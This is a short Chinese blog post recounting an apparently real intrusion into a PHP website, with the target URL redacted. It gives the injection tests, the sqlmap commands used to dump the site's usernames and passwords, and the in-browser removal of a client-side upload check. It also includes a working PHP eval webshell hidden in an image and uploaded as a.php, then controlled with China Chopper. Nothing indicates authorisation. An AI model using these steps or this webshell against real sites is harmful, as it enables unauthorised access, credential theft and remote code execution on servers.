記錄一次實戰,注入+本地JS繞過拿shell
一顆小胡椒2023-05-04 08:50:50
01 正文
1.找注入點

2.測試是否有注入:
http://xxxxxx/xxxx.php?id=6’ ,沒有回顯

輸入:http://xxxxxx/xxxx.php?id=6 and 1=1 有回顯,and 1 = 2沒有回顯,說明存在注入。
3. 使用sqlmap跑。
sqlmap.py -u “http://xxxxx/xxxx.php?id=6”

發現有注入,然后使用–dbs,–tables,–columns,–dump找出用戶名和密碼。
4.使用御劍掃描后臺。然后進行登錄。

我們先上傳一個腳本木馬試試。

發現有黑名單。先看下是否是本地js校驗。右鍵審查元素,發現是本地js校驗。

我們找到表單form,刪除相對應的腳本。

5.重新上傳php一句話,發現

那么試下圖片馬
6.將圖片使用C32Asm打開,在最后面添加一句話:<?php @ eval ( $_POST [ 'pw' ]); ?>


保存,命名為a.php。然后上傳,發現上傳成功,使用菜刀連接,密碼pw。

一顆小胡椒
暫無描述